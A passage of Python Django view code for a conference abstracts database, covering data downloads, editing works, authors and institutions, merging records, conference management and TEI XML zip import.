datetime.fromtimestamp( getmtime(f"{settings.DATA_OUTPUT_PATH}/{settings.DENORMALIZED_WORKS_NAME}.zip") ) for m in dt_config["CONFIGURATION"]: model = attrgetter(m["model"])(models) if "manual_model_description" in m: model_description = m["manual_model_description"] else: try: model_description = model.model_description except: model_description = None all_model_fields = [ { "name": f.name, "relation": f.is_relation, "help_text": f.help_text, "related_model": str(f.related_model) .replace("<class 'abstracts.models.", "") .replace("'>", ""), "type": f.get_internal_type(), "required": field_required(f), } for f in model._meta.fields if not f.one_to_many and f.name not in m["exclude_fields"] ] if m.get("include_string", False): all_model_fields.append( { "name": "label", "relation": None, "help_text": "General label for this object", "related_model": None, "type": "CharField", "required": True, } ) data_dictionary.append( { "model": m["model"], "model_description": model_description, "csv_name": m["csv_name"], "fields": all_model_fields, } ) normalized_last_updated = datetime.fromtimestamp( getmtime(f"{settings.DATA_OUTPUT_PATH}/{dt_config['DATA_ZIP_NAME']}") ) context = { "zip_url": zip_url, "denormalized_url": denormalized_url, "denormalized_last_updated": denormalized_last_updated, "normalized_last_updated": normalized_last_updated, "data_dictionary": data_dictionary, "denormalized_data_dictionary": settings.DENORMALIZED_HEADERS, } return render(request, "downloads.html", context) def download_works_csv(request): target_zip = f"{settings.DATA_OUTPUT_PATH}/{settings.DENORMALIZED_WORKS_NAME}.zip" response = FileResponse(open(target_zip, "rb")) return response def public_download_all_tables(request): target_zip = f"{settings.DATA_OUTPUT_PATH}/{settings.PUBLIC_DATA_TABLE_CONFIG['DATA_ZIP_NAME']}" response = FileResponse(open(target_zip, "rb")) return response @login_required def private_download_all_tables(request): target_zip = f"{settings.DATA_OUTPUT_PATH}/{settings.PRIVATE_DATA_TABLE_CONFIG['DATA_ZIP_NAME']}" response = FileResponse(open(target_zip, "rb")) return response @login_required def WorkCreate(request): if request.method == "GET": if "conference" in request.GET: conf = get_object_or_404(Conference, pk=int(request.GET["conference"])) work_form = WorkForm(initial={"conference": conf.pk}) else: work_form = WorkForm() if request.method == "POST": work_form = WorkForm(request.POST) if work_form.is_valid(): new_work = work_form.save() new_work.user_last_updated = request.user new_work.save() messages.success(request, f"{new_work} created.") return redirect("work_edit_authorship", work_id=new_work.pk) else: for err in work_form.errors: messages.error(request, err) context = {"work_form": work_form} return render(request, "work_create.html", context) @login_required def WorkEdit(request, work_id): work = get_object_or_404(Work, pk=work_id) if request.method == "POST": work_form = WorkForm(request.POST, instance=work) if work_form.is_valid(): work.user_last_updated = request.user work_form.save() messages.success(request, f'"{work.title}" sucessfully updated.') return redirect("work_detail", work_id=work.pk) else: for f, e in work_form.errors.items(): messages.error(request, f"{f}: {e}") work_initial_data = model_to_dict(work) context = {"work_form": WorkForm(initial=work_initial_data), "work": work} return render(request, "work_edit.html", context) @login_required @transaction.atomic def WorkEditAuthorship(request, work_id): work = get_object_or_404(Work, pk=work_id) authorships = work.authorships.all() AuthorshipWorkFormset = formset_factory( WorkAuthorshipForm, can_delete=True, extra=0 ) initial_data = [] for authorship in authorships: base_data = { "author": authorship.author, "authorship_order": authorship.authorship_order, "first_name": authorship.appellation.first_name, "last_name": authorship.appellation.last_name, "affiliations": [aff for aff in authorship.affiliations.all()], } initial_data.append(base_data) if request.method == "GET": authorships_forms = AuthorshipWorkFormset(initial=initial_data) elif request.method == "POST": authorships_forms = AuthorshipWorkFormset(request.POST) if authorships_forms.is_valid(): for d_form in authorships_forms.deleted_forms: d_form_data = d_form.cleaned_data attached_author = d_form_data["author"] Authorship.objects.filter( work=work, author=d_form_data["author"] ).delete() # Refresh the author in DB to update appellations index attached_author.save() for aform in authorships_forms: if aform not in authorships_forms.deleted_forms: aform_data = aform.cleaned_data appellation = Appellation.objects.get_or_create( first_name=aform_data["first_name"], last_name=aform_data["last_name"], )[0] affiliations = aform_data["affiliations"] authorship_order = aform_data["authorship_order"] try: if aform_data["author"] is None: author_id = Author.objects.create() else: author_id = aform_data["author"] auth = Authorship.objects.update_or_create( work=work, author=author_id, defaults={ "authorship_order": authorship_order, "appellation": appellation, "user_last_updated": request.user, }, )[0] author_id.user_last_updated = request.user author_id.save() except IntegrityError as e: messages.error( request, f"{e}: Ensure authorship order numbers are unique" ) return redirect("work_edit_authorship", work.pk) auth.affiliations.clear() if affiliations is not None: auth.affiliations.set(affiliations) messages.success( request, f'"{work.title}" authorships successfully updated.' ) if "start_new" in request.POST: return redirect( f"{reverse('work_create')}?conference={work.conference.pk}" ) return redirect("work_detail", work_id=work.pk) else: for error in authorships_forms.errors: messages.error(request, error) context = { "authorships_form": authorships_forms, "work": work, "affiliation_form": AffiliationEditForm, } return render(request, "work_edit_authorships.html", context) @login_required def AuthorInfoJSON(request, author_id): if request.method == "GET": author = get_object_or_404(Author, pk=author_id) author_aff = Affiliation.objects.filter(asserted_by__author=author).distinct() author_dict = { "first_name": author.most_recent_appellation.first_name, "last_name": author.most_recent_appellation.last_name, "work_titles": [w.title for w in author.works.all()][:4], "works_count": author.works.count(), } if author_aff is not None: author_dict["affiliations"] = [ {"name": str(aff), "id": aff.pk} for aff in author_aff ] return JsonResponse(author_dict) @login_required def AffiliationInfoJSON(request, affiliation_id): if request.method == "GET": affiliation = get_object_or_404(Affiliation, pk=affiliation_id) affiliation_dict = { "institution": { "name": str(affiliation.institution), "id": affiliation.institution.id, } } if affiliation.department is not None: affiliation_dict["department"] = affiliation.department return JsonResponse(affiliation_dict) class WorkDelete(LoginRequiredMixin, SuccessMessageMixin, DeleteView): model = Work template_name = "work_delete.html" extra_context = {"cancel_view": "work_list"} success_url = reverse_lazy("work_list") def delete(self, request, *args, **kwargs): messages.success(self.request, f"'{self.get_object().title}' deleted") return super().delete(request, *args, **kwargs) class FullWorkList(ListView): context_object_name = "work_list" template_name = "work_list.html" paginate_by = 10 def get_queryset(self): base_result_set = Work.objects.all() raw_filter_form = WorkFilter(self.request.GET) if raw_filter_form.is_valid(): result_set = base_result_set filter_form = raw_filter_form.cleaned_data work_type_res = filter_form["work_type"] if work_type_res is not None: result_set = result_set.filter(work_type=work_type_res) conference_res = filter_form["conference"] if conference_res is not None: result_set = result_set.filter(conference=conference_res) affiliation_res = filter_form["affiliation"] if len(affiliation_res) > 0: result_set = result_set.filter( authorships__affiliations__in=affiliation_res ).distinct() institution_res = filter_form["institution"] if len(institution_res) > 0: result_set = result_set.filter( authorships__affiliations__institution__in=institution_res ).distinct() author_res = filter_form["author"] if len(author_res) > 0: result_set = result_set.filter(authorships__author__in=author_res) keyword_res = filter_form["keywords"] if len(keyword_res) > 0: result_set = result_set.filter(keywords__in=keyword_res) topic_res = filter_form["topics"] if len(topic_res) > 0: result_set = result_set.filter(topics__in=topic_res) language_res = filter_form["languages"] if len(language_res) > 0: result_set = result_set.filter(languages__in=language_res) if filter_form["full_text_available"]: result_set = result_set.exclude(full_text="") if filter_form["full_text_viewable"]: result_set = result_set.exclude(full_text="").filter( full_text_license__isnull=False ) text_res = filter_form["text"] if text_res != "": text_query = SearchQuery(text_res, search_type="websearch") result_set = ( result_set.filter(search_text=text_query) .annotate( rank=SearchRank( F("search_text"), text_query, ), # Does the search text show up only in the full text? search_in_ft_only=ExpressionWrapper( ~Q(title__icontains=text_res), output_field=BooleanField() ), ) .filter(rank__gt=0.1) .order_by("-rank") ) order_res = "rank" # To find the last name of the first author, we develop a subquery that will pull the first authorship for a given work. We can then call the appellation__last_name first_author_subquery = Authorship.objects.filter( work=OuterRef("pk") ).order_by("authorship_order") order_res = filter_form["ordering"] if order_res is None or order_res == "": order_res = "year" if order_res == "year": result_set = result_set.order_by("conference__year", "title") elif order_res == "-year": result_set = result_set.order_by("-conference__year", "title") elif order_res == "title": result_set = result_set.order_by("title") elif order_res == "-title": result_set = result_set.order_by("-title") elif order_res == "last_name": result_set = result_set.annotate( first_author_last_name=Subquery( first_author_subquery.values("appellation__last_name")[:1] ) ).order_by("first_author_last_name", "title") elif order_res == "-last_name": result_set = result_set.annotate( first_author_last_name=Subquery( first_author_subquery.values("appellation__last_name")[:1] ) ).order_by("-first_author_last_name", "title") return ( result_set.select_related( "conference", "work_type", "parent_session", "full_text_license" ) .annotate( main_series=StringAgg( "conference__series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), main_institution=StringAgg( "conference__hosting_institutions__name", delimiter=" / ", distinct=True, ), ) .prefetch_related( Prefetch( "conference", queryset=Conference.objects.prefetch_related( Prefetch( "series_memberships", queryset=SeriesMembership.objects.select_related( "series" ), ), "organizers", ), ), "session_papers", Prefetch( "authorships", queryset=Authorship.objects.select_related( "appellation", "author" ), ), "keywords", "topics", "languages", ) ) else: for error in raw_filter_form.errors: messages.warning(self.request, error) return base_result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) raw_filter_form = WorkFilter(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data conference_res = filter_form["conference"] if conference_res is not None: conferences_data = ( Conference.objects.filter(id=conference_res.id) .annotate( n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), ) .select_related("country") .prefetch_related( "organizers", "series_memberships", "series_memberships__series" ) .all() ) context["selected_conferences"] = conferences_data context["work_filter_form"] = WorkFilter(data=self.request.GET) context["available_works_count"] = Work.objects.count() context["filtered_works_count"] = self.get_queryset().count() context["redirect_url"] = reverse("work_list") return context class FullInstitutionList(LoginRequiredMixin, ListView): context_object_name = "institution_list" template_name = "full_institution_list.html" paginate_by = 10 def get_queryset(self): annotated_affiliations = Affiliation.objects.annotate( n_works=Count("asserted_by__work", distinct=True) ) result_set = ( Institution.objects.annotate( n_works=Count("affiliations__asserted_by__work", distinct=True) ) .prefetch_related( Prefetch("affiliations", annotated_affiliations), "country" ) .order_by("-n_works") ) if self.request.GET: raw_filter_form = FullInstitutionForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data result_set = result_set.annotate( n_conferences=Count( "affiliations__asserted_by__work__conference", distinct=True ) ) department_res = filter_form["department"] if department_res != "": result_set = result_set.filter( affiliations__department__icontains=department_res ) affiliation_res = filter_form["affiliation"] if affiliation_res is not None: result_set = result_set.filter(affiliations=affiliation_res) institution_res = filter_form["institution"] if institution_res is not None: result_set = result_set.filter(pk=institution_res.pk) country_res = filter_form["country"] if country_res is not None: result_set = result_set.filter(country=country_res) if filter_form["no_department"]: result_set = result_set.filter(affiliations__department="") conference_res = filter_form["conference"] if conference_res is not None: result_set = result_set.filter( affiliations__asserted_by__work__conference=conference_res ).distinct() if filter_form["singleton"]: result_set = result_set.filter(n_conferences=1) if filter_form["ordering"] == "n_dsc": result_set = result_set.order_by( "-n_works", "affiliations__institution__name" ) elif filter_form["ordering"] == "n_asc": result_set = result_set.order_by( "n_works", "affiliations__institution__name" ) elif filter_form["ordering"] == "a": result_set = result_set.order_by("affiliations__institution__name") else: for f, e in raw_filter_form.errors.items(): messages.error(self.request, f"{f}: {e}") return result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["institution_filter_form"] = FullInstitutionForm( initial=self.request.GET ) context["available_institutions_count"] = Institution.objects.count() context["filtered_institutions_count"] = self.get_queryset().count() context["redirect_url"] = reverse("full_institution_list") return context class AuthorInstitutionList(FullInstitutionList): template_name = "author_institution_list.html" def get_queryset(self): base_result_set = Institution.objects.annotate( n_authors=Count("affiliations__asserted_by__author", distinct=True), n_conferences=Count( "affiliations__asserted_by__work__conference", distinct=True ), ).distinct() result_set = base_result_set if self.request.GET: raw_filter_form = FullInstitutionForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data department_res = filter_form["department"] if department_res != "": result_set = result_set.filter( affiliations__department__icontains=department_res ) affiliation_res = filter_form["affiliation"] if affiliation_res is not None: result_set = result_set.filter(affiliations=affiliation_res) institution_res = filter_form["institution"] if institution_res is not None: result_set = result_set.filter(pk=institution_res.pk) conference_res = filter_form["conference"] if conference_res is not None: result_set = result_set.filter(works__conference=conference_res) country_res = filter_form["country"] if country_res is not None: result_set = result_set.filter(country=country_res) if filter_form["singleton"]: result_set = result_set.filter(n_conferences=1) if filter_form["no_department"]: result_set = result_set.filter(affiliations__department="") if filter_form["ordering"] == "n_dsc": result_set = result_set.order_by("-n_authors") elif filter_form["ordering"] == "n_asc": result_set = result_set.order_by("n_authors") elif filter_form["ordering"] == "a": result_set = result_set.order_by("affiliations__institution__name") else: for f, e in raw_filter_form.errors.items(): messages.error(self.request, f"{f}: {e}") result_set = base_result_set else: # Otherwise default to sorting by n_dsc result_set = result_set.order_by("-n_authors") return result_set.distinct() def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["redirect_url"] = reverse("author_institution_list") return context class InstitutionEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView): model = Institution template_name = "generic_form.html" fields = ["name", "city", "state_province_region", "country"] extra_context = { "form_title": "Edit institution", "cancel_view": "full_institution_list", "merge_view": "institution_merge", } success_message = "%(name)s updated" success_url = reverse_lazy("full_institution_list") def form_valid(self, form): response = super(InstitutionEdit, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response class InstitutionCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Institution template_name = "generic_form.html" fields = ["name", "city", "state_province_region", "country"] extra_context = { "form_title": "Create institution", "cancel_view": "full_institution_list", } success_message = "%(name)s created" success_url = reverse_lazy("full_institution_list") def form_valid(self, form): response = super(InstitutionCreate, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response @user_is_staff @transaction.atomic def institution_merge(request, institution_id): institution = get_object_or_404(Institution, pk=institution_id) context = {"merging": institution, "institution_merge_form": InstitutionMergeForm} if request.method == "GET": """ Initial load of the merge form displays all the authors and works associated with this institution. """ return render(request, "institution_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = InstitutionMergeForm(request.POST) if raw_form.is_valid(): target_institution = raw_form.cleaned_data["into"] if institution == target_institution: """ If the user chooses the existing institution, don't merge, but instead error out. """ messages.error( request, f"You cannot merge an institution into itself. Please select a different institution.", ) return redirect("institution_merge", institution_id=institution_id) else: old_institution_id = str(institution) merge_results = institution.merge(target_institution) target_institution.user_last_updated = request.user target_institution.save() messages.success( request, f"Author {old_institution_id} has been merged into {target_institution}, and the old institution entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} affiliations updated" ) return redirect("institution_edit", pk=target_institution.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "institution_merge.html", context) @user_is_staff @transaction.atomic def institution_multi_merge(request): context = {"form": InstitutionMultiMergeForm} if request.method == "POST": raw_form = InstitutionMultiMergeForm(request.POST) if raw_form.is_valid(): target_institution = raw_form.cleaned_data["into"] source_institutions = raw_form.cleaned_data["sources"].exclude( pk=target_institution.pk ) for institution in source_institutions: old_institution_id = str(institution) merge_results = institution.merge(target_institution) target_institution.user_last_updated = request.user target_institution.save() messages.success( request, f"Institution {old_institution_id} has been merged into {target_institution}, and the old institution entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} institutions updated" ) return redirect("institution_edit", pk=target_institution.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "institution_multi_merge.html", context) class AffiliationEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView): model = Affiliation template_name = "generic_form.html" form_class = AffiliationEditForm extra_context = { "form_title": "Edit affiliation", "cancel_view": "full_institution_list", "merge_view": "affiliation_merge", } success_message = "%(department)s updated" success_url = reverse_lazy("full_institution_list") class AffiliationCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Affiliation template_name = "generic_form.html" form_class = AffiliationEditForm extra_context = { "form_title": "Create affiliation", "cancel_view": "full_institution_list", } success_message = "%(department)s created" success_url = reverse_lazy("full_institution_list") def get_initial(self, **kwargs): super().get_initial(**kwargs) if "institution" in self.request.GET: self.initial = {"institution": int(self.request.GET["institution"])} return self.initial @login_required def ajax_affiliation_create(request): newaff = Affiliation.objects.get_or_create( department=request.POST["department"], institution=Institution.objects.get(pk=int(request.POST["institution"])), )[0] return JsonResponse({"name": str(newaff), "id": newaff.pk}) @user_is_staff @transaction.atomic def affiliation_merge(request, affiliation_id): affiliation = get_object_or_404(Affiliation, pk=affiliation_id) context = {"merging": affiliation, "affiliation_merge_form": AffiliationMergeForm} if request.method == "GET": """ Initial load of the merge form displays all the authors and works associated with this affiliation. """ return render(request, "affiliation_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = AffiliationMergeForm(request.POST) if raw_form.is_valid(): target_affiliation = raw_form.cleaned_data["into"] if affiliation == target_affiliation: """ If the user chooses the existing affiliation, don't merge, but instead error out. """ messages.error( request, f"You cannot merge an affiliation into itself. Please select a different affiliation.", ) return redirect("affiliation_merge", affiliation_id=affiliation_id) else: old_affiliation_id = str(affiliation) merge_results = affiliation.merge(target_affiliation) messages.success( request, f"Affiliation {old_affiliation_id} has been merged into {target_affiliation}, and the old affiliation entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} affiliations updated" ) return redirect("affiliation_edit", pk=target_affiliation.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "affiliation_merge.html", context) @user_is_staff @transaction.atomic def affiliation_multi_merge(request): context = {"form": AffiliationMultiMergeForm} if request.method == "POST": raw_form = AffiliationMultiMergeForm(request.POST) if raw_form.is_valid(): target_affiliation = raw_form.cleaned_data["into"] source_affiliations = raw_form.cleaned_data["sources"].exclude( pk=target_affiliation.pk ) for affiliation in source_affiliations: old_affiliation_id = str(affiliation) merge_results = affiliation.merge(target_affiliation) messages.success( request, f"Affiliation {old_affiliation_id} has been merged into {target_affiliation}, and the old affiliation entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} affiliations updated" ) return redirect("affiliation_edit", pk=target_affiliation.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "affiliation_multi_merge.html", context) @user_is_staff @transaction.atomic def wipe_unused(request): deletion_dict = { "Author": Author.objects.exclude(authorships__isnull=False).distinct(), "Affiliation": Affiliation.objects.exclude( asserted_by__isnull=False ).distinct(), "Institution": Institution.objects.exclude( Q(affiliations__asserted_by__isnull=False) | Q(conferences__isnull=False) ).distinct(), "Keyword": Keyword.objects.exclude(works__isnull=False).distinct(), "Appellation": Appellation.objects.exclude( asserted_by__isnull=False ).distinct(), } if request.method == "POST": for k, v in deletion_dict.items(): res = v.delete() if res[0] > 0: messages.success(request, f"{k}: {res[0]} objects deleted") any_hanging_items = any([v.exists() for k, v in deletion_dict.items()]) context = {"deletions": deletion_dict, "hanging_items": any_hanging_items} return render(request, "wipe_unused.html", context) class ConferenceCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = Conference template_name = "conference_create.html" form_class = ConferenceForm extra_context = { "form_title": "Create conference", "cancel_view": "conference_list", } success_message = "Conference '%(year)s - %(short_title)s' created" @transaction.atomic def post(self, request, *args, **kwargs): response = super().post(request, *args, **kwargs) form_instance = self.get_form() if form_instance.is_valid(): for organizer in form_instance.cleaned_data["organizers"]: self.object.organizers.add(organizer) self.object.save() return response if "goto_abstracts" in request.POST: return redirect(reverse("work_list") + f"?conference={self.object.id}") else: for err in form_instance.errors: messages.error(request, err) return response @user_is_staff @transaction.atomic def ConferenceEdit(request, pk): conference = get_object_or_404(Conference, pk=pk) # populate the conference form, including pulling in the related organizers conference_dict = model_to_dict(conference) conference_dict["organizers"] = conference.organizers.all() form = ConferenceForm(initial=conference_dict) ConferenceSeriesFormSet = formset_factory( ConferenceSeriesInline, can_delete=True, extra=0 ) initial_series = [ {"series": memb.series, "number": memb.number} for memb in SeriesMembership.objects.filter(conference=conference).all() ] context = { "conference": conference, "form": form, # "licenses": License.objects.all(), "series_membership_form": ConferenceSeriesFormSet(initial=initial_series), "form_title": "Edit conference", "cancel_view": "conference_list", } if request.method == "POST": form = ConferenceForm(data=request.POST, instance=conference) if form.is_valid(): clean_form = form.cleaned_data conference.year = clean_form["year"] conference.short_title = clean_form["short_title"] conference.notes = clean_form["notes"] conference.url = clean_form["url"] # Clear existing relations and update according to the form conference.organizers.clear() for organizer in clean_form["organizers"]: conference.organizers.add(organizer) conference.hosting_institutions.clear() for hosting_institution in clean_form["hosting_institutions"]: conference.hosting_institutions.add(hosting_institution) conference.save() # License action license_action = clean_form["license_action"] if license_action == "": pass elif license_action == "clear": conference.works.all().update(full_text_license=None) else: license_object = License.objects.get(id=int(license_action)) conference.works.all().update(full_text_license=license_object) series_forms = ConferenceSeriesFormSet(data=request.POST) if series_forms.is_valid(): # Delete memberships first for d_form in series_forms.deleted_forms: d_form_data = d_form.cleaned_data SeriesMembership.objects.filter( conference=conference, series=d_form_data["series"], number=d_form_data["number"], ).delete() # Then update new ones for s_form in series_forms.forms: if s_form not in series_forms.deleted_forms: s_form_data = s_form.cleaned_data SeriesMembership.objects.update_or_create( conference=conference, series=s_form_data["series"], defaults={"number": s_form_data["number"]}, ) messages.success(request, f"Conference {conference} updated.") if "goto_abstracts" in request.POST: return redirect( reverse("work_list") + f"?conference={conference.id}" ) if "goto_series" in request.POST: first_series = conference.series.first() if first_series is None: return redirect("standalone_conferences") else: return redirect("conference_series_detail", pk=first_series.id) return redirect("conference_edit", pk=conference.pk) else: for f, e in series_forms.errors.items(): messages.error(request, f"{f}: {e}") else: for f, e in form.errors.items(): messages.error(request, f"{f}: {e}") return render(request, "conference_edit.html", context) class ConferenceDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Conference template_name = "conference_delete.html" extra_context = { "form_title": "Delete conference", "cancel_view": "conference_list", } success_message = "Conference deleted" success_url = reverse_lazy("conference_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(ConferenceDelete, self).delete(request, *args, **kwargs) class ConferenceXMLLoad(StaffRequiredMixin, DetailView): model = Conference template_name = "conference_xml_load.html" extra_context = {"form": ConferenceXMLUploadForm()} @transaction.atomic def post(self, request, *args, **kwargs): raw_form = ConferenceXMLUploadForm(request.POST, request.FILES) conference = self.get_object() if raw_form.is_valid(): with TemporaryDirectory() as upload_dir: # Write uploaded zip to tempdir with NamedTemporaryFile(dir=upload_dir, suffix=".zip") as tei_zip: with open(tei_zip.name, "wb") as upload_zip: for chunk in request.FILES["file"]: upload_zip.write(chunk) if not zipfile.is_zipfile(tei_zip.name): messages.error(request, "That is not a valid zipfile.") return render( request, "conference_xml_load.html", { "object": self.get_object(), "form": ConferenceXMLUploadForm(), }, ) # Extract all the files within with zipfile.ZipFile(tei_zip.name) as zip_ref: zip_ref.extractall(upload_dir) # Import all XML import_results = conference.import_xml_directory(upload_dir) n_success = len(import_results["successful_files"]) n_failed = len(import_results["failed_files"]) messages.info( request, f"{n_success} of {n_success + n_failed} files valid.", ) for err in import_results["failed_files"]: messages.error( request, f"{basename(err['filepath'])}: {err['error']}" ) if n_failed == 0: messages.success(request, f"All files imported successfully.") else: messages.info( request, "Please fix errors or remove malformed files, and re-upload zip. All TEI documents must be valid in order to complete the import.", ) return render( request, "conference_xml_load.html", {"object": self.get_object(), "form": ConferenceXMLUploadForm()}, ) else: for f, e in raw_form.errors.items(): messages.error(request, f"{f}: {e}") return render( request, "conference_xml_load.html", {"object": self.get_object(), "form": ConferenceXMLUploadForm()}, ) @login_required @transaction.atomic def conference_checkout(request, conference_id): conference = get_object_or_404(Conference, pk=conference_id) if request.method == "GET": """ Load the current form and display current attached user """ context = { "conference": conference, "form": ConferenceCheckoutForm( {"entry_status": conference.entry_status, "editing_user": "self"} ), } return render(request, "conference_checkout.html", context) elif request.method == "POST": """ Get the form and update the status if the user has the authority to do so """ raw_form = ConferenceCheckoutForm(request.POST) if raw_form.is_valid(): clean_form = raw_form.cleaned_data if clean_form["entry_status"] == "c" and not request.user.is_staff: messages.error( request, "Only an administrator can mark this conference as completed.", ) return redirect("conference_checkout", conference_id=conference.id) else: if clean_form["assign_user"] == "self": conference.entry_status = clean_form["entry_status"] conference.editing_user = request.user conference.save() messages.success(request, "Conference checked out") elif clean_form["assign_user"] == "clear": conference.entry_status = clean_form["entry_status"] conference.editing_user = None conference.save() messages.success(request, "Conference cleared") return redirect(reverse("work_list") + f"?conference={conference.id}") class SeriesCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = ConferenceSeries template_name = "generic_form.html" extra_context = { "form_title": "Create conference series", "cancel_view": "conference_list", } fields = ["title", "abbreviation", "notes"] success_message = "Series '%(title)s' created" success_url = reverse_lazy("conference_list") class SeriesEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = ConferenceSeries template_name = "generic_form.html" extra_context = { "form_title": "Update conference series", "cancel_view": "conference_list", } fields = ["title", "abbreviation", "notes"] success_message = "Series '%(title)s' updated" success_url = reverse_lazy("conference_list") class SeriesDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = ConferenceSeries template_name = "generic_form.html" extra_context = { "form_title": "Delete conference series", "cancel_view": "conference_list", } success_message = "Series '%(title)s' deleted" success_url = reverse_lazy("conference_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(SeriesDelete, self).delete(request, *args, **kwargs) class OrganizerCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = Organizer template_name = "generic_form.html" extra_context = { "form_title": "Create conference organizer", "cancel_view": "full_organizer_list", } fields = ["name", "abbreviation", "conferences_organized", "notes", "url"] success_message = "Organizer '%(name)s' created" success_url = reverse_lazy("full_organizer_list") def form_valid(self, form): response = super(OrganizerCreate, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response class OrganizerEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = Organizer template_name = "generic_form.html" extra_context = { "form_title": "Update conference organizer", "cancel_view": "full_organizer_list", } fields = ["name", "abbreviation", "conferences_organized", "notes", "url"] success_message = "Organizer '%(name)s' updated" success_url = reverse_lazy("full_organizer_list") def form_valid(self, form): response = super(OrganizerEdit, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response class OrganizerDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Organizer template_name = "generic_form.html" extra_context = { "form_title": "Delete organizer", "cancel_view": "full_organizer_list", } success_message = "Organizer %(name)s deleted." success_url = reverse_lazy("full_organizer_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(OrganizerDelete, self).delete(request, *args, **kwargs) class OrganizerList(LoginRequiredMixin, ListView): model = Organizer template_name = "full_organizer_list.html" context_object_name = "organizer_list" class KeywordCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Keyword template_name = "generic_form.html" extra_context = {"form_title": "Create keyword", "cancel_view": "full_keyword_list"} fields = ["title"] success_message = "Keyword '%(title)s' created" success_url = reverse_lazy("full_keyword_list") class KeywordDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Keyword template_name = "generic_form.html" extra_context = {"form_title": "Delete keyword", "cancel_view": "full_keyword_list"} success_message = "Keyword '%(title)s' deleted" success_url = reverse_lazy("full_keyword_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(KeywordDelete, self).delete(request, *args, **kwargs) class KeywordEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = Keyword template_name = "generic_form.html" extra_context = { "form_title": "Update keyword", "cancel_view": "full_keyword_list", "merge_view": "keyword_merge", "delete_view": "keyword_delete", } fields = ["title"] success_message = "Keyword '%(title)s' updated" success_url = reverse_lazy("full_keyword_list") class KeywordList(LoginRequiredMixin, ListView): model = Keyword template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Keywords", "tag_edit_view": "keyword_edit", "tag_create_view": "keyword_create", "tag_list_view": "full_keyword_list", "multi_merge": "keyword_multi_merge", "filter_param_name": "keywords", } def get_queryset(self): base_results_set = Keyword.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) if self.request.GET: raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter( title__icontains=filter_form["name"] ) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") else: for f, e in raw_filter_form.errors.items(): messages.error(self.request, f"{f}: {e}") else: results_set = results_set.order_by("title") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["tag_filter_form"] = TagForm(initial=self.request.GET) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Keyword.objects.count() return context @user_is_staff @transaction.atomic def keyword_merge(request, keyword_id): keyword = get_object_or_404(Keyword, pk=keyword_id) affected_works = Work.objects.filter(keywords=keyword).all() sample_works = affected_works[:15] count_elements = affected_works.count() - 15 context = { "merging": keyword, "tag_merge_form": KeywordMergeForm, "sample_elements": sample_works, "tag_category": "Keyword", "merge_view": "keyword_merge", } if request.method == "GET": """ Initial load of the merge form displays all the authors and works associated with this keyword. """ return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = KeywordMergeForm(request.POST) if raw_form.is_valid(): target_keyword = raw_form.cleaned_data["into"] if keyword == target_keyword: """ If the user chooses the existing keyword, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a keyword into itself. Please select a different keyword.", ) return redirect("keyword_merge", keyword_id=keyword_id) else: old_keyword_id = str(keyword) merge_results = keyword.merge(target_keyword) messages.success( request, f"Keyword {old_keyword_id} has been merged into {target_keyword}, and the old keyword entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} keywords updated" ) return redirect("keyword_edit", pk=target_keyword.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", 